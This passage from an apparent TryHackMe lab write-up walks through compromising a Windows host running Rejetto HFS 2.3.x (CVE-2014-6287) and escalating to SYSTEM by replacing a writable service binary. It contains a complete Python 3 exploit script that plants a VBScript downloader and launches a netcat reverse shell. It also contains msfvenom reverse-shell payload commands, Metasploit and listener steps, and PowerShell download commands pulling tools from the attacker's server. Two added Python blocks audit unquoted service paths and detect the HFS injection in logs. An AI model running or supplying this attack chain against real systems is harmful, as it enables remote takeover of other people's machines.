The CanRestart option being true allows us to restart a service on the system, and the directory of the application is also writable. This means we can replace the legitimate application with our malicious one and restart the service, which will then run our infected program. Note: the service showed up as unquoted (and could be exploited using that technique); however, in this case we exploited weak file permissions on the service files instead.
📕 RTFM (Metasploit)
```
# get the PowerUp.ps1 script for Windows (see the DFIR section)
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
msfconsole
search rejetto # you can use searchsploit first to find relevant exploits that can later be imported into metasploit.
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS <victim's IP>
set RPORT <victim's port>
meterpreter > # once the exploit returns a session
upload /path/to/PowerUp.ps1/script/on/the/attacker's/machine
load powershell
powershell_shell
. .\PowerUp.ps1 # yes, . .\PowerUp.ps1 (dot-source it), not just .\PowerUp.ps1
Invoke-AllChecks # lists all misconfigs that can lead to PE.
# Abusing a legit Service Path
# https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.7.88 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ServiceToAbuse.exe
meterpreter> shell
sc stop ServiceToAbuse # if the service is running, you won't be able to overwrite it: you will get a "process is being used" error
meterpreter> cd /path/to/the/service/to/abuse # shell and meterpreter might have different current paths
meterpreter> upload /path/to/venom/exe/on/attacking/machine # uploading the service will overwrite the legit one
# Run a listener. Option #1: netcat
nc -l -p 4443 # the same port specified in the msfvenom command
# ❗️ Run a listener. Option #2: msfconsole (use a different msfconsole Terminal)
# the module to use is called exploit/multi/handler
use exploit/multi/handler
set LHOST <attacker's IP>
set LPORT <attacker's Port> # the same port specified in the msfvenom command
run
meterpreter> shell
sc start ServiceToAbuse # starts the service, which now runs the replaced binary
# check your listener
```
PowerUp.ps1 and winPEAS are two different ways to do the job.
Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!
- Exploit script: https://www.exploit-db.com/exploits/39161
- Standalone netcat: https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
📕 RTFM (Manual)
Let's assume the following:
- My attacking machine's IP is `X.X.X.X`.
- The first netcat listener is sitting on port `YYYY` (normal user session).
- My python web server is listening on port `80` (web server hosting `nc.exe`).
- My second netcat listener is sitting on port `ZZZZ` (elevated session).
- My victim machine's IP is `S.S.S.S`.
Steps:
- Download the exploit script (see the updated script for Python 3 below).
- Download winPEAS.
- Download standalone netcat.
- Rename it to `nc.exe` (since the exploit is looking for `nc.exe`, and on GitHub it's called `ncat.exe` instead).
- Download accesschk.exe.
- From whatever directory you have saved the above executables in, run the following command in the Terminal/console: `python -m http.server 80`. Note that the port is set to 80. On TryHackMe you won't be able to do that easily with an Attack Machine, since the port is occupied by some python remote desktop process. In order to make it work, you need to modify the VBScript payload and explicitly specify a different port (the `vbs` variable in the exploit). Make sure to URL encode the `:80` before adding it. You can also rename `nc.exe` to `ncat.exe` in the script instead of renaming the executable itself. Your call. In decoded form, the change is from `xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False` to `xHttp.Open "GET", "http://"+ip_addr+":80/nc.exe", False`.
- Run `nc -l YYYY` on the attacker's machine so that when the `nc_run()` function is run, the `nc.exe` downloaded from your python-powered server can connect back to your machine.
- Run the script itself with `python 39161.py S.S.S.S 8080` (note that `39161.py` is the default name for this exploit and it might be different in the future). If no errors are shown but the python server doesn't show any activity and `nc` doesn't receive any connections, rerun the exploit several times.
- Monitor the Terminal with the python server running to see if the exploit worked.
- Monitor the Terminal with netcat running to see if a remote session was successfully established.
- Now, in the Terminal window with the nc session successfully established, check the user by running `whoami`. If all is ok, run the following powershell commands to download `winPEAS.exe` (to check for misconfigurations that allow privilege escalation) and `accesschk.exe` (to check file and folder permissions). Sometimes on a Mac, when you copy a string with a single quote, it gets changed to a backtick; if powershell complains, check the quotes and retype them manually.
```
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/winPEAS.exe','C:\Program Files (x86)\IObit\winpeas.exe')
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/accesschk.exe','C:\Program Files (x86)\IObit\achk.exe')
```
- If all is ok and the files were copied successfully (try Desktop to save them), run `winpeas.exe`. In this lab we were provided a hint that we can exploit some unquoted service path. You can run `winpeas.exe quiet servicesinfo` to see only services' vulnerabilities. Our aim is to find the service that:
  - runs with admin (SYSTEM) rights;
  - the current user (in this case, bill) can start and stop;
  - the current user can write to the directory the service executable is stored in.
- For each service, check whether it satisfies every requirement listed above with `achk.exe /accepteula -ucqv <servicename>`:
  - `-u` stands for "user" and returns information about the user account the specified service runs under.
  - `-c` indicates that the user account must have the "Log on as a service" right.
  - `-q` specifies that the output should be in quiet mode, i.e., with minimal output.
  - `-v` is for verbose mode and provides more detailed information.
- Since it's the unquoted service path vulnerability, we need to upload our executable with a specific name. Read more about this type of vulnerability here [3].
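The three conditions above, together with the unquoted path noted at the top of the page, are also what a defender should audit for. The Python below is an added example, not part of the original write-up nor of PowerUp or winPEAS; it runs over constructed `sc qc`-style binary paths and `icacls`-style ACL lines (the service names and paths are made up), flags unquoted paths that contain spaces, emits the quoted `binPath` to set with `sc config`, and lists broad principals that can write into the executable's directory.

```python
import re

# Constructed sample data (not from a real host). Binary paths are in the form
# reported by `sc qc <svc>` (BINARY_PATH_NAME) or Win32_Service.PathName; the
# ACL lines mimic `icacls <dir>` output for the service executable's directory.
SAMPLE_SERVICES = {
    "IObitHelper": r"C:\Program Files (x86)\IObit\Advanced Tool\svc.exe",
    "Dnscache": r"C:\Windows\system32\svchost.exe -k NetworkService -p",
    "Spooler": r'"C:\Windows\System32\spoolsv.exe"',
    "VendorUpdater": r"C:\Program Files\Vendor Tools\updater.exe -service",
}
SAMPLE_ICACLS = [
    r"C:\Program Files (x86)\IObit BUILTIN\Users:(OI)(CI)(F)",
    r"                          NT AUTHORITY\SYSTEM:(OI)(CI)(F)",
]

_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)
WEAK_PRINCIPALS = ("Everyone", r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users")
WRITE_RIGHTS = ("(F)", "(M)", "(W)", "(WD)")


def is_unquoted_with_spaces(bin_path):
    """Return (vulnerable, exe_path, args). The SCM tries every space-delimited
    prefix of an unquoted path as a candidate executable, so only unquoted
    paths whose executable part contains a space are at risk."""
    if bin_path.startswith('"'):
        return False, bin_path, ""
    m = _EXE_RE.match(bin_path.strip())
    if not m:
        return False, bin_path, ""
    exe_path, args = m.group(1), (m.group(2) or "").strip()
    return " " in exe_path, exe_path, args


def quoted_bin_path(bin_path):
    """Remediation value for `sc config <svc> binPath= "..."`."""
    vulnerable, exe_path, args = is_unquoted_with_spaces(bin_path)
    if not vulnerable:
        return bin_path
    return f'"{exe_path}"' + (f" {args}" if args else "")


def weak_dir_writers(icacls_lines):
    """Broad principals holding write-capable rights on the directory."""
    return [p for line in icacls_lines for p in WEAK_PRINCIPALS
            if p + ":" in line and any(r in line for r in WRITE_RIGHTS)]


def audit(services):
    """Map each vulnerable service name to its corrected binPath."""
    return {n: quoted_bin_path(p) for n, p in services.items()
            if is_unquoted_with_spaces(p)[0]}
```

Quoting the path closes the search-order hole; a writable directory (as `weak_dir_writers` reports) is a separate finding that needs the ACL tightened, since it lets a user replace the binary even when the path is quoted.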
The exploit script was written for Python 2, so I had to add parentheses to the `print` function. It also used an outdated library, so I had to change the calls from `urllib2` to `urllib3` and the function it was calling, since they are two completely different libraries. To make troubleshooting easier, I added `try-except` blocks.
```python
#!/usr/bin/env python3
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
# Usage : python Exploit.py <Target IP address> <Target Port Number>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib3
import sys

try:
    def script_create():
        # {.save.} macro: writes the VBScript downloader to C:\Users\Public\script.vbs on the target
        try:
            http = urllib3.PoolManager()
            url = "http://" + sys.argv[1] + ":" + sys.argv[2] + "/?search=%00{.+" + save + ".}"
            http.request('GET', url)
            print("All good! script_create executed.")
        except Exception as e:
            print("script_create failed: {}".format(e))

    def execute_script():
        # {.exec.} macro: runs the VBScript, which fetches nc.exe from our web server
        try:
            http = urllib3.PoolManager()
            url = "http://" + sys.argv[1] + ":" + sys.argv[2] + "/?search=%00{.+" + exe + ".}"
            http.request('GET', url)
            print("All good! execute_script executed.")
        except Exception as e:
            print("execute_script failed: {}".format(e))

    def nc_run():
        # {.exec.} macro: launches nc.exe, which connects back to ip_addr:local_port
        try:
            http = urllib3.PoolManager()
            url = "http://" + sys.argv[1] + ":" + sys.argv[2] + "/?search=%00{.+" + exe1 + ".}"
            http.request('GET', url)
            print("All good! nc_run executed.")
        except Exception as e:
            print("nc_run failed: {}".format(e))

    ip_addr = "X.X.X.X"  # local IP address
    local_port = "YYYY"  # Local Port number
    vbs = r"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save = "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe = "exec|" + vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20" + ip_addr + "%20" + local_port
    exe1 = "exec|" + vbs3

    script_create()
    execute_script()
    nc_run()
except Exception:
    # reached mainly when the two command-line arguments are missing
    print("""[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forget to change the Local IP address and Port number in the script""")
```
```
# on the victim (in the nc session): fetch the replacement binary into the service directory
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/Advanced.exe','C:\Program Files (x86)\IObit\Advanced.exe')
# on the attacker's machine: how Advanced.exe was generated (the second netcat listens on ZZZZ)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=ZZZZ -f exe -o Advanced.exe
```
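As an added detection example (not part of the original write-up or of the exploit): every request the script above sends shares one signature, a `%00` in the `search` parameter followed by HFS macro syntax. The Python below parses constructed access-log lines (made up, not real traffic) and reports the macro names smuggled in after the NUL byte, which is what a log review or WAF rule for CVE-2014-6287 should key on.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed CLF-style access log lines (made up, not real traffic). HFS 2.3.x
# (CVE-2014-6287) stops sanitising the `search` parameter at a NUL byte, so the
# macro text after %00 reaches the template engine; the two 10.0.0.9 lines
# reproduce the request shape of the script above.
SAMPLE_LOG = r"""
10.0.0.5 - - [10/Jan/2023:10:00:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2023:10:00:07 +0000] "GET /?search=%00{.+save|C:\Users\Public\script.vbs|dim%20xHttp.} HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2023:10:00:09 +0000] "GET /?search=%00{.+exec|cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs.} HTTP/1.1" 200 512
10.0.0.5 - - [10/Jan/2023:10:00:12 +0000] "GET /?search=%7B.notes.%7D HTTP/1.1" 200 512
""".strip().splitlines()

_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')
_MACRO_RE = re.compile(r"\{\.\W?(\w+)")  # {.save|...}, {.exec|...}, also "{.+exec|"


def request_target(line):
    """The request target ("/?search=...") from a CLF line, or None."""
    m = _REQUEST_RE.search(line)
    return m.group(1) if m else None


def search_after_nul(target):
    """Decoded text following a NUL byte in `search`, or None. The NUL is the
    signature; a macro without it ("{.notes.}") is escaped by HFS and ignored."""
    query = urlsplit(target).query
    for value in parse_qs(query, keep_blank_values=True).get("search", []):
        if "\x00" in value:
            return value.split("\x00", 1)[1]
    return None


def detect_hfs_injection(line):
    """Names of the HFS macros smuggled in after the NUL byte ([] if clean)."""
    target = request_target(line)
    tail = search_after_nul(target) if target else None
    return _MACRO_RE.findall(tail) if tail else []


def scan_log(lines):
    """[(client_ip, macro names)] for every line carrying the injection."""
    hits = []
    for line in lines:
        macros = detect_hfs_injection(line)
        if macros:
            hits.append((line.split(" ", 1)[0], macros))
    return hits
```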
References
[1] A great write-up for this lab - https://medium.com/@algobernadortaco/steel-mountain-tryhackme-write-up-w-o-metasploit-c6dd5836ac09 (an option without metasploit).